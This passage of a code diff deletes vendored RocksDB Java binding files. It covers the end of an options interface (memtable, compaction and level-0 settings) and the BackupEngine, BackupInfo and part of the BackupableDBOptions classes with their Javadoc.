-   * from huge page TLB but from malloc.
-   * Need to reserve huge pages for it to be allocated. For example:
-   *     sysctl -w vm.nr_hugepages=20
-   * See linux doc Documentation/vm/hugetlbpage.txt
-   *
-   * @param memtableHugePageSize The page size of the huge
-   *     page tlb
-   * @return the reference to the current options.
-   */
-  T setMemtableHugePageSize(
-      long memtableHugePageSize);
-
-  /**
-   * Page size for huge page TLB for bloom in memtable. If &le; 0, not allocate
-   * from huge page TLB but from malloc.
-   * Need to reserve huge pages for it to be allocated. For example:
-   *     sysctl -w vm.nr_hugepages=20
-   * See linux doc Documentation/vm/hugetlbpage.txt
-   *
-   * @return The page size of the huge page tlb
-   */
-  long memtableHugePageSize();
-
-  /**
-   * The size of one block in arena memory allocation.
-   * If &le; 0, a proper value is automatically calculated (usually 1/10 of
-   * writer_buffer_size).
-   *
-   * There are two additional restriction of the specified size:
-   * (1) size should be in the range of [4096, 2 &lt;&lt; 30] and
-   * (2) be the multiple of the CPU word (which helps with the memory
-   * alignment).
-   *
-   * We'll automatically check and adjust the size number to make sure it
-   * conforms to the restrictions.
-   * Default: 0
-   *
-   * @param arenaBlockSize the size of an arena block
-   * @return the reference to the current options.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setArenaBlockSize(long arenaBlockSize);
-
-  /**
-   * The size of one block in arena memory allocation.
-   * If &le; 0, a proper value is automatically calculated (usually 1/10 of
-   * writer_buffer_size).
-   *
-   * There are two additional restriction of the specified size:
-   * (1) size should be in the range of [4096, 2 &lt;&lt; 30] and
-   * (2) be the multiple of the CPU word (which helps with the memory
-   * alignment).
-   *
-   * We'll automatically check and adjust the size number to make sure it
-   * conforms to the restrictions.
-   * Default: 0
-   *
-   * @return the size of an arena block
-   */
-  long arenaBlockSize();
-
-  /**
-   * Soft limit on number of level-0 files. We start slowing down writes at this
-   * point. A value &lt; 0 means that no writing slow down will be triggered by
-   * number of files in level-0.
-   *
-   * @param level0SlowdownWritesTrigger The soft limit on the number of
-   *   level-0 files
-   * @return the reference to the current options.
-   */
-  T setLevel0SlowdownWritesTrigger(
-      int level0SlowdownWritesTrigger);
-
-  /**
-   * Soft limit on number of level-0 files. We start slowing down writes at this
-   * point. A value &lt; 0 means that no writing slow down will be triggered by
-   * number of files in level-0.
-   *
-   * @return The soft limit on the number of
-   *   level-0 files
-   */
-  int level0SlowdownWritesTrigger();
-
-  /**
-   * Maximum number of level-0 files.  We stop writes at this point.
-   *
-   * @param level0StopWritesTrigger The maximum number of level-0 files
-   * @return the reference to the current options.
-   */
-  T setLevel0StopWritesTrigger(
-      int level0StopWritesTrigger);
-
-  /**
-   * Maximum number of level-0 files.  We stop writes at this point.
-   *
-   * @return The maximum number of level-0 files
-   */
-  int level0StopWritesTrigger();
-
-  /**
-   * The target file size for compaction.
-   * This targetFileSizeBase determines a level-1 file size.
-   * Target file size for level L can be calculated by
-   * targetFileSizeBase * (targetFileSizeMultiplier ^ (L-1))
-   * For example, if targetFileSizeBase is 2MB and
-   * target_file_size_multiplier is 10, then each file on level-1 will
-   * be 2MB, and each file on level 2 will be 20MB,
-   * and each file on level-3 will be 200MB.
-   * by default targetFileSizeBase is 2MB.
-   *
-   * @param targetFileSizeBase the target size of a level-0 file.
-   * @return the reference to the current options.
-   *
-   * @see #setTargetFileSizeMultiplier(int)
-   */
-  T setTargetFileSizeBase(
-      long targetFileSizeBase);
-
-  /**
-   * The target file size for compaction.
-   * This targetFileSizeBase determines a level-1 file size.
-   * Target file size for level L can be calculated by
-   * targetFileSizeBase * (targetFileSizeMultiplier ^ (L-1))
-   * For example, if targetFileSizeBase is 2MB and
-   * target_file_size_multiplier is 10, then each file on level-1 will
-   * be 2MB, and each file on level 2 will be 20MB,
-   * and each file on level-3 will be 200MB.
-   * by default targetFileSizeBase is 2MB.
-   *
-   * @return the target size of a level-0 file.
-   *
-   * @see #targetFileSizeMultiplier()
-   */
-  long targetFileSizeBase();
-
-  /**
-   * targetFileSizeMultiplier defines the size ratio between a
-   * level-L file and level-(L+1) file.
-   * By default target_file_size_multiplier is 1, meaning
-   * files in different levels have the same target.
-   *
-   * @param multiplier the size ratio between a level-(L+1) file
-   *     and level-L file.
-   * @return the reference to the current options.
-   */
-  T setTargetFileSizeMultiplier(
-      int multiplier);
-
-  /**
-   * targetFileSizeMultiplier defines the size ratio between a
-   * level-(L+1) file and level-L file.
-   * By default targetFileSizeMultiplier is 1, meaning
-   * files in different levels have the same target.
-   *
-   * @return the size ratio between a level-(L+1) file and level-L file.
-   */
-  int targetFileSizeMultiplier();
-
-  /**
-   * The ratio between the total size of level-(L+1) files and the total
-   * size of level-L files for all L.
-   * DEFAULT: 10
-   *
-   * @param multiplier the ratio between the total size of level-(L+1)
-   *     files and the total size of level-L files for all L.
-   * @return the reference to the current options.
-   *
-   * See {@link MutableColumnFamilyOptionsInterface#setMaxBytesForLevelBase(long)}
-   */
-  T setMaxBytesForLevelMultiplier(double multiplier);
-
-  /**
-   * The ratio between the total size of level-(L+1) files and the total
-   * size of level-L files for all L.
-   * DEFAULT: 10
-   *
-   * @return the ratio between the total size of level-(L+1) files and
-   *     the total size of level-L files for all L.
-   *
-   * See {@link MutableColumnFamilyOptionsInterface#maxBytesForLevelBase()}
-   */
-  double maxBytesForLevelMultiplier();
-
-  /**
-   * Different max-size multipliers for different levels.
-   * These are multiplied by max_bytes_for_level_multiplier to arrive
-   * at the max-size of each level.
-   *
-   * Default: 1
-   *
-   * @param maxBytesForLevelMultiplierAdditional The max-size multipliers
-   *   for each level
-   * @return the reference to the current options.
-   */
-  T setMaxBytesForLevelMultiplierAdditional(
-      int[] maxBytesForLevelMultiplierAdditional);
-
-  /**
-   * Different max-size multipliers for different levels.
-   * These are multiplied by max_bytes_for_level_multiplier to arrive
-   * at the max-size of each level.
-   *
-   * Default: 1
-   *
-   * @return The max-size multipliers for each level
-   */
-  int[] maxBytesForLevelMultiplierAdditional();
-
-  /**
-   * All writes will be slowed down to at least delayed_write_rate if estimated
-   * bytes needed to be compaction exceed this threshold.
-   *
-   * Default: 64GB
-   *
-   * @param softPendingCompactionBytesLimit The soft limit to impose on
-   *   compaction
-   * @return the reference to the current options.
-   */
-  T setSoftPendingCompactionBytesLimit(
-      long softPendingCompactionBytesLimit);
-
-  /**
-   * All writes will be slowed down to at least delayed_write_rate if estimated
-   * bytes needed to be compaction exceed this threshold.
-   *
-   * Default: 64GB
-   *
-   * @return The soft limit to impose on compaction
-   */
-  long softPendingCompactionBytesLimit();
-
-  /**
-   * All writes are stopped if estimated bytes needed to be compaction exceed
-   * this threshold.
-   *
-   * Default: 256GB
-   *
-   * @param hardPendingCompactionBytesLimit The hard limit to impose on
-   *   compaction
-   * @return the reference to the current options.
-   */
-  T setHardPendingCompactionBytesLimit(
-      long hardPendingCompactionBytesLimit);
-
-  /**
-   * All writes are stopped if estimated bytes needed to be compaction exceed
-   * this threshold.
-   *
-   * Default: 256GB
-   *
-   * @return The hard limit to impose on compaction
-   */
-  long hardPendingCompactionBytesLimit();
-
-  /**
-   * An iteration-&gt;Next() sequentially skips over keys with the same
-   * user-key unless this option is set. This number specifies the number
-   * of keys (with the same userkey) that will be sequentially
-   * skipped before a reseek is issued.
-   * Default: 8
-   *
-   * @param maxSequentialSkipInIterations the number of keys could
-   *     be skipped in a iteration.
-   * @return the reference to the current options.
-   */
-  T setMaxSequentialSkipInIterations(
-      long maxSequentialSkipInIterations);
-
-  /**
-   * An iteration-&gt;Next() sequentially skips over keys with the same
-   * user-key unless this option is set. This number specifies the number
-   * of keys (with the same userkey) that will be sequentially
-   * skipped before a reseek is issued.
-   * Default: 8
-   *
-   * @return the number of keys could be skipped in a iteration.
-   */
-  long maxSequentialSkipInIterations();
-
-  /**
-   * Maximum number of successive merge operations on a key in the memtable.
-   *
-   * When a merge operation is added to the memtable and the maximum number of
-   * successive merges is reached, the value of the key will be calculated and
-   * inserted into the memtable instead of the merge operation. This will
-   * ensure that there are never more than max_successive_merges merge
-   * operations in the memtable.
-   *
-   * Default: 0 (disabled)
-   *
-   * @param maxSuccessiveMerges the maximum number of successive merges.
-   * @return the reference to the current options.
-   * @throws java.lang.IllegalArgumentException thrown on 32-Bit platforms
-   *   while overflowing the underlying platform specific value.
-   */
-  T setMaxSuccessiveMerges(
-      long maxSuccessiveMerges);
-
-  /**
-   * Maximum number of successive merge operations on a key in the memtable.
-   *
-   * When a merge operation is added to the memtable and the maximum number of
-   * successive merges is reached, the value of the key will be calculated and
-   * inserted into the memtable instead of the merge operation. This will
-   * ensure that there are never more than max_successive_merges merge
-   * operations in the memtable.
-   *
-   * Default: 0 (disabled)
-   *
-   * @return the maximum number of successive merges.
-   */
-  long maxSuccessiveMerges();
-
-  /**
-   * After writing every SST file, reopen it and read all the keys.
-   *
-   * Default: false
-   *
-   * @param paranoidFileChecks true to enable paranoid file checks
-   * @return the reference to the current options.
-   */
-  T setParanoidFileChecks(
-      boolean paranoidFileChecks);
-
-  /**
-   * After writing every SST file, reopen it and read all the keys.
-   *
-   * Default: false
-   *
-   * @return true if paranoid file checks are enabled
-   */
-  boolean paranoidFileChecks();
-
-  /**
-   * Measure IO stats in compactions and flushes, if true.
-   *
-   * Default: false
-   *
-   * @param reportBgIoStats true to enable reporting
-   * @return the reference to the current options.
-   */
-  T setReportBgIoStats(
-      boolean reportBgIoStats);
-
-  /**
-   * Determine whether IO stats in compactions and flushes are being measured
-   *
-   * @return true if reporting is enabled
-   */
-  boolean reportBgIoStats();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupEngine.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupEngine.java
deleted file mode 100644
index 7639945..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupEngine.java
+++ /dev/null
@@ -1,221 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import java.util.List;
-
-/**
- * BackupEngine allows you to backup
- * and restore the database
- *
- * Be aware, that `new BackupEngine` takes time proportional to the amount
- * of backups. So if you have a slow filesystem to backup (like HDFS)
- * and you have a lot of backups then restoring can take some time.
- * That's why we recommend to limit the number of backups.
- * Also we recommend to keep BackupEngine alive and not to recreate it every
- * time you need to do a backup.
- */
-public class BackupEngine extends RocksObject implements AutoCloseable {
-
-  protected BackupEngine(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * Opens a new Backup Engine
-   *
-   * @param env The environment that the backup engine should operate within
-   * @param options Any options for the backup engine
-   *
-   * @return A new BackupEngine instance
-   * @throws RocksDBException thrown if the backup engine could not be opened
-   */
-  public static BackupEngine open(final Env env,
-      final BackupableDBOptions options) throws RocksDBException {
-    return new BackupEngine(open(env.nativeHandle_, options.nativeHandle_));
-  }
-
-  /**
-   * Captures the state of the database in the latest backup
-   *
-   * Just a convenience for {@link #createNewBackup(RocksDB, boolean)} with
-   * the flushBeforeBackup parameter set to false
-   *
-   * @param db The database to backup
-   *
-   * Note - This method is not thread safe
-   *
-   * @throws RocksDBException thrown if a new backup could not be created
-   */
-  public void createNewBackup(final RocksDB db) throws RocksDBException {
-    createNewBackup(db, false);
-  }
-
-  /**
-   * Captures the state of the database in the latest backup
-   *
-   * @param db The database to backup
-   * @param flushBeforeBackup When true, the Backup Engine will first issue a
-   *                          memtable flush and only then copy the DB files to
-   *                          the backup directory. Doing so will prevent log
-   *                          files from being copied to the backup directory
-   *                          (since flush will delete them).
-   *                          When false, the Backup Engine will not issue a
-   *                          flush before starting the backup. In that case,
-   *                          the backup will also include log files
-   *                          corresponding to live memtables. The backup will
-   *                          always be consistent with the current state of the
-   *                          database regardless of the flushBeforeBackup
-   *                          parameter.
-   *
-   * Note - This method is not thread safe
-   *
-   * @throws RocksDBException thrown if a new backup could not be created
-   */
-  public void createNewBackup(
-      final RocksDB db, final boolean flushBeforeBackup)
-      throws RocksDBException {
-    assert (isOwningHandle());
-    createNewBackup(nativeHandle_, db.nativeHandle_, flushBeforeBackup);
-  }
-
-  /**
-   * Gets information about the available
-   * backups
-   *
-   * @return A list of information about each available backup
-   */
-  public List<BackupInfo> getBackupInfo() {
-    assert (isOwningHandle());
-    return getBackupInfo(nativeHandle_);
-  }
-
-  /**
-   * <p>Returns a list of corrupted backup ids. If there
-   * is no corrupted backup the method will return an
-   * empty list.</p>
-   *
-   * @return array of backup ids as int ids.
-   */
-  public int[] getCorruptedBackups() {
-    assert(isOwningHandle());
-    return getCorruptedBackups(nativeHandle_);
-  }
-
-  /**
-   * <p>Will delete all the files we don't need anymore. It will
-   * do the full scan of the files/ directory and delete all the
-   * files that are not referenced.</p>
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void garbageCollect() throws RocksDBException {
-    assert(isOwningHandle());
-    garbageCollect(nativeHandle_);
-  }
-
-  /**
-   * Deletes old backups, keeping just the latest numBackupsToKeep
-   *
-   * @param numBackupsToKeep The latest n backups to keep
-   *
-   * @throws RocksDBException thrown if the old backups could not be deleted
-   */
-  public void purgeOldBackups(
-      final int numBackupsToKeep) throws RocksDBException {
-    assert (isOwningHandle());
-    purgeOldBackups(nativeHandle_, numBackupsToKeep);
-  }
-
-  /**
-   * Deletes a backup
-   *
-   * @param backupId The id of the backup to delete
-   *
-   * @throws RocksDBException thrown if the backup could not be deleted
-   */
-  public void deleteBackup(final int backupId) throws RocksDBException {
-    assert (isOwningHandle());
-    deleteBackup(nativeHandle_, backupId);
-  }
-
-  /**
-   * Restore the database from a backup
-   *
-   * IMPORTANT: if options.share_table_files == true and you restore the DB
-   * from some backup that is not the latest, and you start creating new
-   * backups from the new DB, they will probably fail!
-   *
-   * Example: Let's say you have backups 1, 2, 3, 4, 5 and you restore 3.
-   * If you add new data to the DB and try creating a new backup now, the
-   * database will diverge from backups 4 and 5 and the new backup will fail.
-   * If you want to create new backup, you will first have to delete backups 4
-   * and 5.
-   *
-   * @param backupId The id of the backup to restore
-   * @param dbDir The directory to restore the backup to, i.e. where your
-   *              database is
-   * @param walDir The location of the log files for your database,
-   *               often the same as dbDir
-   * @param restoreOptions Options for controlling the restore
-   *
-   * @throws RocksDBException thrown if the database could not be restored
-   */
-  public void restoreDbFromBackup(
-      final int backupId, final String dbDir, final String walDir,
-      final RestoreOptions restoreOptions) throws RocksDBException {
-    assert (isOwningHandle());
-    restoreDbFromBackup(nativeHandle_, backupId, dbDir, walDir,
-        restoreOptions.nativeHandle_);
-  }
-
-  /**
-   * Restore the database from the latest backup
-   *
-   * @param dbDir The directory to restore the backup to, i.e. where your
-   *              database is
-   * @param walDir The location of the log files for your database, often the
-   *               same as dbDir
-   * @param restoreOptions Options for controlling the restore
-   *
-   * @throws RocksDBException thrown if the database could not be restored
-   */
-  public void restoreDbFromLatestBackup(
-      final String dbDir, final String walDir,
-      final RestoreOptions restoreOptions) throws RocksDBException {
-    assert (isOwningHandle());
-    restoreDbFromLatestBackup(nativeHandle_, dbDir, walDir,
-        restoreOptions.nativeHandle_);
-  }
-
-  private native static long open(final long env,
-      final long backupableDbOptions) throws RocksDBException;
-
-  private native void createNewBackup(final long handle, final long dbHandle,
-      final boolean flushBeforeBackup) throws RocksDBException;
-
-  private native List<BackupInfo> getBackupInfo(final long handle);
-
-  private native int[] getCorruptedBackups(final long handle);
-
-  private native void garbageCollect(final long handle) throws RocksDBException;
-
-  private native void purgeOldBackups(final long handle,
-      final int numBackupsToKeep) throws RocksDBException;
-
-  private native void deleteBackup(final long handle, final int backupId)
-      throws RocksDBException;
-
-  private native void restoreDbFromBackup(final long handle, final int backupId,
-      final String dbDir, final String walDir, final long restoreOptionsHandle)
-      throws RocksDBException;
-
-  private native void restoreDbFromLatestBackup(final long handle,
-      final String dbDir, final String walDir, final long restoreOptionsHandle)
-      throws RocksDBException;
-
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupInfo.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupInfo.java
deleted file mode 100644
index 10f4186..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupInfo.java
+++ /dev/null
@@ -1,66 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * Instances of this class describe a Backup made by
- * {@link org.rocksdb.BackupEngine}.
- */
-public class BackupInfo {
-
-  /**
-   * Package private constructor used to create instances
-   * of BackupInfo by {@link org.rocksdb.BackupEngine}
-   *
-   * @param backupId id of backup
-   * @param timestamp timestamp of backup
-   * @param size size of backup
-   * @param numberFiles number of files related to this backup.
-   */
-  BackupInfo(final int backupId, final long timestamp, final long size,
-      final int numberFiles) {
-    backupId_ = backupId;
-    timestamp_ = timestamp;
-    size_ = size;
-    numberFiles_ = numberFiles;
-  }
-
-  /**
-   *
-   * @return the backup id.
-   */
-  public int backupId() {
-    return backupId_;
-  }
-
-  /**
-   *
-   * @return the timestamp of the backup.
-   */
-  public long timestamp() {
-    return timestamp_;
-  }
-
-  /**
-   *
-   * @return the size of the backup
-   */
-  public long size() {
-    return size_;
-  }
-
-  /**
-   *
-   * @return the number of files of this backup.
-   */
-  public int numberFiles() {
-    return numberFiles_;
-  }
-
-  private int backupId_;
-  private long timestamp_;
-  private long size_;
-  private int numberFiles_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupableDBOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupableDBOptions.java
deleted file mode 100644
index 8bb4143..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BackupableDBOptions.java
+++ /dev/null
@@ -1,465 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.io.File;
-
-/**
- * <p>BackupableDBOptions to control the behavior of a backupable database.
- * It will be used during the creation of a {@link org.rocksdb.BackupEngine}.
- * </p>
- * <p>Note that dispose() must be called before an Options instance
- * become out-of-scope to release the allocated memory in c++.</p>
- *
- * @see org.rocksdb.BackupEngine
- */
-public class BackupableDBOptions extends RocksObject {
-
-  private Env backupEnv = null;
-  private Logger infoLog = null;
-  private RateLimiter backupRateLimiter = null;
-  private RateLimiter restoreRateLimiter = null;
-
-  /**
-   * <p>BackupableDBOptions constructor.</p>
-   *
-   * @param path Where to keep the backup files. Has to be different than db
-   *   name. Best to set this to {@code db name_ + "/backups"}
-   * @throws java.lang.IllegalArgumentException if illegal path is used.
-   */
-  public BackupableDBOptions(final String path) {
-    super(newBackupableDBOptions(ensureWritableFile(path)));
-  }
-
-  private static String ensureWritableFile(final String path) {
-    final File backupPath = path == null ? null : new File(path);
-    if (backupPath == null || !backupPath.isDirectory() ||
-        !backupPath.canWrite()) {
-      throw new IllegalArgumentException("Illegal path provided.");
-    } else {
-      return path;
-    }
-  }
-
-  /**
-   * <p>Returns the path to the BackupableDB directory.</p>
-   *
-   * @return the path to the BackupableDB directory.
-   */
-  public String backupDir() {
-    assert(isOwningHandle());
-    return backupDir(nativeHandle_);
-  }
-
-  /**
-   * Backup Env object. It will be used for backup file I/O. If it's
-   * null, backups will be written out using DBs Env. Otherwise
-   * backup's I/O will be performed using this object.
-   *
-   * If you want to have backups on HDFS, use HDFS Env here!
-   *
-   * Default: null
-   *
-   * @param env The environment to use
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setBackupEnv(final Env env) {
-    assert(isOwningHandle());
-    setBackupEnv(nativeHandle_, env.nativeHandle_);
-    this.backupEnv = env;
-    return this;
-  }
-
-  /**
-   * Backup Env object. It will be used for backup file I/O. If it's
-   * null, backups will be written out using DBs Env. Otherwise
-   * backup's I/O will be performed using this object.
-   *
-   * If you want to have backups on HDFS, use HDFS Env here!
-   *
-   * Default: null
-   *
-   * @return The environment in use
-   */
-  public Env backupEnv() {
-    return this.backupEnv;
-  }
-
-  /**
-   * <p>Share table files between backups.</p>
-   *
-   * @param shareTableFiles If {@code share_table_files == true}, backup will
-   *   assume that table files with same name have the same contents. This
-   *   enables incremental backups and avoids unnecessary data copies. If
-   *   {@code share_table_files == false}, each backup will be on its own and
-   *   will not share any data with other backups.
-   *
-   * <p>Default: true</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setShareTableFiles(final boolean shareTableFiles) {
-    assert(isOwningHandle());
-    setShareTableFiles(nativeHandle_, shareTableFiles);
-    return this;
-  }
-
-  /**
-   * <p>Share table files between backups.</p>
-   *
-   * @return boolean value indicating if SST files will be shared between
-   *     backups.
-   */
-  public boolean shareTableFiles() {
-    assert(isOwningHandle());
-    return shareTableFiles(nativeHandle_);
-  }
-
-  /**
-   * Set the logger to use for Backup info and error messages
-   *
-   * @param logger The logger to use for the backup
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setInfoLog(final Logger logger) {
-    assert(isOwningHandle());
-    setInfoLog(nativeHandle_, logger.nativeHandle_);
-    this.infoLog = logger;
-    return this;
-  }
-
-  /**
-   * Set the logger to use for Backup info and error messages
-   *
-   * Default: null
-   *
-   * @return The logger in use for the backup
-   */
-  public Logger infoLog() {
-    return this.infoLog;
-  }
-
-  /**
-   * <p>Set synchronous backups.</p>
-   *
-   * @param sync If {@code sync == true}, we can guarantee you'll get consistent
-   *   backup even on a machine crash/reboot. Backup process is slower with sync
-   *   enabled. If {@code sync == false}, we don't guarantee anything on machine
-   *   reboot. However, chances are some of the backups are consistent.
-   *
-   * <p>Default: true</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setSync(final boolean sync) {
-    assert(isOwningHandle());
-    setSync(nativeHandle_, sync);
-    return this;
-  }
-
-  /**
-   * <p>Are synchronous backups activated.</p>
-   *
-   * @return boolean value if synchronous backups are configured.
-   */
-  public boolean sync() {
-    assert(isOwningHandle());
-    return sync(nativeHandle_);
-  }
-
-  /**
-   * <p>Set if old data will be destroyed.</p>
-   *
-   * @param destroyOldData If true, it will delete whatever backups there are
-   *   already.
-   *
-   * <p>Default: false</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setDestroyOldData(final boolean destroyOldData) {
-    assert(isOwningHandle());
-    setDestroyOldData(nativeHandle_, destroyOldData);
-    return this;
-  }
-
-  /**
-   * <p>Returns if old data will be destroyed will performing new backups.</p>
-   *
-   * @return boolean value indicating if old data will be destroyed.
-   */
-  public boolean destroyOldData() {
-    assert(isOwningHandle());
-    return destroyOldData(nativeHandle_);
-  }
-
-  /**
-   * <p>Set if log files shall be persisted.</p>
-   *
-   * @param backupLogFiles If false, we won't backup log files. This option can
-   *   be useful for backing up in-memory databases where log file are
-   *   persisted, but table files are in memory.
-   *
-   * <p>Default: true</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setBackupLogFiles(final boolean backupLogFiles) {
-    assert(isOwningHandle());
-    setBackupLogFiles(nativeHandle_, backupLogFiles);
-    return this;
-  }
-
-  /**
-   * <p>Return information if log files shall be persisted.</p>
-   *
-   * @return boolean value indicating if log files will be persisted.
-   */
-  public boolean backupLogFiles() {
-    assert(isOwningHandle());
-    return backupLogFiles(nativeHandle_);
-  }
-
-  /**
-   * <p>Set backup rate limit.</p>
-   *
-   * @param backupRateLimit Max bytes that can be transferred in a second during
-   *   backup. If 0 or negative, then go as fast as you can.
-   *
-   * <p>Default: 0</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setBackupRateLimit(long backupRateLimit) {
-    assert(isOwningHandle());
-    backupRateLimit = (backupRateLimit <= 0) ? 0 : backupRateLimit;
-    setBackupRateLimit(nativeHandle_, backupRateLimit);
-    return this;
-  }
-
-  /**
-   * <p>Return backup rate limit which described the max bytes that can be
-   * transferred in a second during backup.</p>
-   *
-   * @return numerical value describing the backup transfer limit in bytes per
-   *   second.
-   */
-  public long backupRateLimit() {
-    assert(isOwningHandle());
-    return backupRateLimit(nativeHandle_);
-  }
-
-  /**
-   * Backup rate limiter. Used to control transfer speed for backup. If this is
-   * not null, {@link #backupRateLimit()} is ignored.
-   *
-   * Default: null
-   *
-   * @param backupRateLimiter The rate limiter to use for the backup
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setBackupRateLimiter(final RateLimiter backupRateLimiter) {
-    assert(isOwningHandle());
-    setBackupRateLimiter(nativeHandle_, backupRateLimiter.nativeHandle_);
-    this.backupRateLimiter = backupRateLimiter;
-    return this;
-  }
-
-  /**
-   * Backup rate limiter. Used to control transfer speed for backup. If this is
-   * not null, {@link #backupRateLimit()} is ignored.
-   *
-   * Default: null
-   *
-   * @return The rate limiter in use for the backup
-   */
-  public RateLimiter backupRateLimiter() {
-    assert(isOwningHandle());
-    return this.backupRateLimiter;
-  }
-
-  /**
-   * <p>Set restore rate limit.</p>
-   *
-   * @param restoreRateLimit Max bytes that can be transferred in a second
-   *   during restore. If 0 or negative, then go as fast as you can.
-   *
-   * <p>Default: 0</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setRestoreRateLimit(long restoreRateLimit) {
-    assert(isOwningHandle());
-    restoreRateLimit = (restoreRateLimit <= 0) ? 0 : restoreRateLimit;
-    setRestoreRateLimit(nativeHandle_, restoreRateLimit);
-    return this;
-  }
-
-  /**
-   * <p>Return restore rate limit which described the max bytes that can be
-   * transferred in a second during restore.</p>
-   *
-   * @return numerical value describing the restore transfer limit in bytes per
-   *   second.
-   */
-  public long restoreRateLimit() {
-    assert(isOwningHandle());
-    return restoreRateLimit(nativeHandle_);
-  }
-
-  /**
-   * Restore rate limiter. Used to control transfer speed during restore. If
-   * this is not null, {@link #restoreRateLimit()} is ignored.
-   *
-   * Default: null
-   *
-   * @param restoreRateLimiter The rate limiter to use during restore
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setRestoreRateLimiter(final RateLimiter restoreRateLimiter) {
-    assert(isOwningHandle());
-    setRestoreRateLimiter(nativeHandle_, restoreRateLimiter.nativeHandle_);
-    this.restoreRateLimiter = restoreRateLimiter;
-    return this;
-  }
-
-  /**
-   * Restore rate limiter. Used to control transfer speed during restore. If
-   * this is not null, {@link #restoreRateLimit()} is ignored.
-   *
-   * Default: null
-   *
-   * @return The rate limiter in use during restore
-   */
-  public RateLimiter restoreRateLimiter() {
-    assert(isOwningHandle());
-    return this.restoreRateLimiter;
-  }
-
-  /**
-   * <p>Only used if share_table_files is set to true. If true, will consider
-   * that backups can come from different databases, hence a sst is not uniquely
-   * identified by its name, but by the triple (file name, crc32, file length)
-   * </p>
-   *
-   * @param shareFilesWithChecksum boolean value indicating if SST files are
-   *   stored using the triple (file name, crc32, file length) and not its name.
-   *
-   * <p>Note: this is an experimental option, and you'll need to set it manually
-   * turn it on only if you know what you're doing*</p>
-   *
-   * <p>Default: false</p>
-   *
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setShareFilesWithChecksum(
-      final boolean shareFilesWithChecksum) {
-    assert(isOwningHandle());
-    setShareFilesWithChecksum(nativeHandle_, shareFilesWithChecksum);
-    return this;
-  }
-
-  /**
-   * <p>Return of share files with checksum is active.</p>
-   *
-   * @return boolean value indicating if share files with checksum
-   *     is active.
-   */
-  public boolean shareFilesWithChecksum() {
-    assert(isOwningHandle());
-    return shareFilesWithChecksum(nativeHandle_);
-  }
-
-  /**
-   * Up to this many background threads will copy files for
-   * {@link BackupEngine#createNewBackup(RocksDB, boolean)} and
-   * {@link BackupEngine#restoreDbFromBackup(int, String, String, RestoreOptions)}
-   *
-   * Default: 1
-   *
-   * @param maxBackgroundOperations The maximum number of background threads
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setMaxBackgroundOperations(
-      final int maxBackgroundOperations) {
-    assert(isOwningHandle());
-    setMaxBackgroundOperations(nativeHandle_, maxBackgroundOperations);
-    return this;
-  }
-
-  /**
-   * Up to this many background threads will copy files for
-   * {@link BackupEngine#createNewBackup(RocksDB, boolean)} and
-   * {@link BackupEngine#restoreDbFromBackup(int, String, String, RestoreOptions)}
-   *
-   * Default: 1
-   *
-   * @return The maximum number of background threads
-   */
-  public int maxBackgroundOperations() {
-    assert(isOwningHandle());
-    return maxBackgroundOperations(nativeHandle_);
-  }
-
-  /**
-   * During backup user can get callback every time next
-   * {@link #callbackTriggerIntervalSize()} bytes being copied.
-   *
-   * Default: 4194304
-   *
-   * @param callbackTriggerIntervalSize The interval size for the
-   *     callback trigger
-   * @return instance of current BackupableDBOptions.
-   */
-  public BackupableDBOptions setCallbackTriggerIntervalSize(
-      final long callbackTriggerIntervalSize) {
-    assert(isOwningHandle());
-    setCallbackTriggerIntervalSize(nativeHandle_, callbackTriggerIntervalSize);
-    return this;
-  }
-
-  /**
-   * During backup user can get callback every time next
-   * {@link #callbackTriggerIntervalSize()} bytes being copied.
-   *
-   * Default: 4194304
-   *
-   * @return The interval size for the callback trigger
-   */
-  public long callbackTriggerIntervalSize() {
-    assert(isOwningHandle());
-    return callbackTriggerIntervalSize(nativeHandle_);
-  }
-
-  private native static long newBackupableDBOptions(final String path);
-  private native String backupDir(long handle);
-  private native void setBackupEnv(final long handle, final long envHandle);
